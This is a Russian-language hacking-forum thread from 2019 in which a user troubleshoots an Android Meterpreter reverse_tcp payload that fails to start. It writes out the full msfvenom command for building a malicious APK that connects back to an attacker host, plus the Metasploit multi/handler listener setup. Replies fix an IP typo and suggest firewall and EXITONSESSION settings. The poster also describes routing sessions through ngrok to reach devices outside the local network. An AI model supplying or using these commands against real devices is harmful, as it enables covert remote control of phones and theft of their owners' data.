 |
|

20.10.2019, 15:34
|
|
Новичок
Регистрация: 18.09.2019
Сообщений: 0
С нами:
3502401
Репутация:
0
|
|
всем приветики!!! такие вот дела: создаю payload
msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.105 LPORT=4444 -f raw -o /tmp/android.apk
потом:
msf5> use exploit/multi/handler
msf5> exploit(multi/handler) set PAYLOAD android/meterpreter/reverse_tcp
msf5> exploit(multi/handler) set LHOST 192.168.0.105
msf5> exploit(multi/handler) set LPORT 4444
msf5> exploit(multi/handler) exploit
запустился handler и слушает пакеты... в это время скидываю android.apk, запускаю.
такая картина:[*] Started reverse TCP handler on 192.168.0.105:4444[*] Sending stage (73550 bytes) to 192.168.0.104
прилетает сессия, handler учуял какие то движения на порту 4444, и все. метерпретер не запускается.
заметьте, это в локальной сети! если пропускать через ngrok сессия (не в локалке) токартина почти такая же. handler пишет что прилетела сессия 1, и так же метерпретер тупа не запускается....
я вот не пойму, это у меня что-то с метерпретером/метасплоитом или же проблема в другом?
PS примерно месяц назад все работало. может это обновления андроида? (обновил дроид неделю назад). не верится что столько лет жили с такой уязвимость, а тут неделю назад решили устранить это..
я бы поробовал на более старой версии андроида но нет его у меня, зато есть вы и античат
|
|
|

20.10.2019, 15:55
|
|
Новичок
Регистрация: 14.11.2017
Сообщений: 0
С нами:
4471577
Репутация:
0
|
|
Не знаю опечатался ты тут или у себя в консоле, но ты создаёшь веномский Пайлод для ип 1092.168.0.105
Ну и да дырку могли пофиксать, они не зря свой хлеб кушают
|
|
|

20.10.2019, 16:03
|
|
Новичок
Регистрация: 18.09.2019
Сообщений: 0
С нами:
3502401
Репутация:
0
|
|
mrOkey сказал(а):
веномский Пайлод
а в чем разница? метерпретер та один? может я что-то не знаю.... просвети))
вот совсем не хочется думать что там такие балбесы сидят... годами не исправляли, а тут решили исправить...
mrOkey сказал(а):
Не знаю опечатался ты тут или у себя в консоле, но ты создаёшь веномский Пайлод для ип 1092.168.0.105
Ну и да дырку могли пофиксать, они не зря свой хлеб кушают
msf > use payload/android/meterpreter/reverse_tcp
msf payload(reverse_tcp) > set LHOST 192.168.0.105
LHOST => 192.168.0.105
msf payload(reverse_tcp) > generate -t raw -f /tmp/android.apk[*] Writing 8992 bytes to /tmp/android.apk...
msf payload(reverse_tcp) >
ты про это?
|
|
|

20.10.2019, 16:08
|
|
Новичок
Регистрация: 14.11.2017
Сообщений: 0
С нами:
4471577
Репутация:
0
|
|
s unity сказал(а):
msfvenom -p android/meterpreter/reverse_tcp LHOST=1092.168.0.105 LPORT=4444 -f raw -o /tmp/android.apk
про это
|
|
|

20.10.2019, 16:16
|
|
Новичок
Регистрация: 18.09.2019
Сообщений: 0
С нами:
3502401
Репутация:
0
|
|
mrOkey сказал(а):
про это
я тебя не понимаю...
а чем еще создать та ?
с помощью msfvenom я создаю файл .apk в котором сидит пейлоад android/meterpreter/reverse_tcp который будет отправлять сессию на 192.168.0.105 по 4444 порту, который заблаговременно слушает handler.. если что-то не так, поправь меня
|
|
|

20.10.2019, 16:18
|
|
Новичок
Регистрация: 14.11.2017
Сообщений: 0
С нами:
4471577
Репутация:
0
|
|
s unity сказал(а):
я тебя не понимаю...
а чем еще создать та ?
с помощью msfvenom я создаю файл .apk в котором сидит пейлоад android/meterpreter/reverse_tcp который будет отправлять сессию на 192.168.0.105 по 4444 порту, который заблаговременно слушает handler.. если что-то не так, поправь меня
Да блин, ты внимательно посмотри на параметр LHOST.
Я тебе говорю, что я не знаю где ты опечатался - тут или у себя в консоле. Потому что в сообщении ты написал 1092.168 и далее
|
|
|

20.10.2019, 16:22
|
|
Новичок
Регистрация: 18.09.2019
Сообщений: 0
С нами:
3502401
Репутация:
0
|
|
mrOkey сказал(а):
параметр LHOST 1092.168 и далее
ааа блин здесь опечатался. щас поправлю))) я уже о другом подумал, начал гуглить. уже зарегался на ноунейм форумах, поднял кучу статей... а тут всего лишь опечатка
|
|
|

20.10.2019, 16:29
|
|
Новичок
Регистрация: 14.11.2017
Сообщений: 0
С нами:
4471577
Репутация:
0
|
|
окей, тогда по порядку. Порт 4444 в фаерволе открыл?
ещё чекни этот параметр для листнера
Код:
Код:
msf exploit(handler) > set EXITONSESSION false
|
|
|

20.10.2019, 16:36
|
|
Новичок
Регистрация: 18.09.2019
Сообщений: 0
С нами:
3502401
Репутация:
0
|
|
mrOkey сказал(а):
окей, тогда по порядку. Порт 4444 в фаерволе открыл?
сессия ведь прилетает...
сейчас чекнул namp свой ип 192.168.0.105
4444/tcp open krb524
вызывает подозрения процесс krb524 на этом порту
|
|
|

20.10.2019, 16:40
|
|
Новичок
Регистрация: 14.11.2017
Сообщений: 0
С нами:
4471577
Репутация:
0
|
|
s unity сказал(а):
сессия ведь прилетает...
сейчас чекнул namp свой ип 192.168.0.105
4444/tcp open krb524
вызывает подозрения процесс krb524 на этом порту
nmap выносит предположение о сервисе. Не факт что у тебя именно он висит.
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|